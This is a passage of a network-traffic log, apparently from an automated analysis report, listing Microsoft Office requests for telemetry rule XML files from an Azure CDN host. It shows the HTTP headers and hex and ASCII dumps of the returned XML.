                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          120192.168.2.54991613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:16 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:16 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1364
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                          x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180216Z-174c587ffdf9xbcchC1TEBxkz40000000350000000008xep
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:17 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          121192.168.2.54991513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:16 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:16 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1401
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                          ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                          x-ms-request-id: 45241df0-c01e-00a1-1a4f-3c7e4a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180216Z-178bfbc474bscnbchC1NYCe7eg00000004xg00000000cgtx
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:17 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          122192.168.2.54992113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:18 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:18 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1354
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                          ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                          x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180218Z-15b8b599d88z9sc7hC1TEBkr4w00000003ag00000000haar
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:19 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          123192.168.2.54992013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:18 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:19 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1391
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                          ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                          x-ms-request-id: 7a9d449b-801e-0047-7f8c-3d7265000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180219Z-15b8b599d88m7pn7hC1TEB4axw000000036g00000000nc9e
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:19 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          124192.168.2.54992313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:18 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:19 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                          ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                          x-ms-request-id: 2537c9bf-601e-0050-536a-3c2c9c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180219Z-174c587ffdfmlsmvhC1TEBvyks00000003ag00000000p79y
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:19 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          125192.168.2.54992413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:18 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:19 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                          ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                          x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180219Z-178bfbc474bxkclvhC1NYC69g400000004p000000000k59p
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:19 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          126192.168.2.54992213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:18 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:19 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                          ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                          x-ms-request-id: 5af92f63-c01e-00a1-4c0c-3d7e4a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180219Z-178bfbc474btrnf9hC1NYCb80g00000004xg00000000e26y
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:19 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          127192.168.2.54992813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:20 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:21 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                          ETag: "0x8DC582BDF497570"
                                                                                                                                                                          x-ms-request-id: 77142413-201e-000c-6b0a-3d79c4000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180221Z-178bfbc474bwlrhlhC1NYCy3kg00000004xg0000000008st
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          128192.168.2.54993113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:21 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:21 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                          ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                          x-ms-request-id: 734d7ed2-001e-002b-08e4-3c99f2000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180221Z-178bfbc474bvjk8shC1NYC83ns00000004m000000000f22v
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          129192.168.2.54992913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:21 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:21 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                          ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                          x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180221Z-174c587ffdfb485jhC1TEBmc1s00000002zg00000000r035
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
